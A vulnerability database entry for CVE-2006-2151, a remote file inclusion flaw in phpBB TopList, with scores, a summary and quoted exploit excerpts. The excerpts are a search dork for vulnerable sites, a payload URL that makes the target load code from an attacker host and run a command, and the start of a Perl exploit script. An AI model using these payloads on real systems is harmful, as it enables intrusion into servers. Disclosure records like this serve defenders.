7.5
CVSSv2

CVE-2006-2151

Published: 03/05/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in toplist.php in phpBB TopList 1.3.8 and previous versions, when register_globals is enabled, allows remote malicious users to include arbitrary files via the phpbb_root_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

phpbb group phpbb toplist

Exploits

Title: TopList Hack for PHPBB <= 138 Remote File Inclusion URL: wwwphpbb2hacksde/toplist-df148html Dork: inurl:"toplistphp" "powered by phpbb" Credits: [Oo] Exploit: /toplistphp?f=toplist_top10&phpbb_root_path=yourhost/cmdgif?cmd=ls # milw0rmcom [2006-04-27] ...
# TopList Hack for PHPBB <= 138 Remote File Inclusion # Based on milw0rmcom/exploits/1722 # Bug found by : [Oo] # # No more uploading php shells !!! # This is my way of php include exploitation !!! # Learn to play with sockets !!! # FOX_MULDER (fox_mulder@abvbg) #!/usr/bin/perl use LWP 564; use IO::Socket; use LWP::Simple; ( ...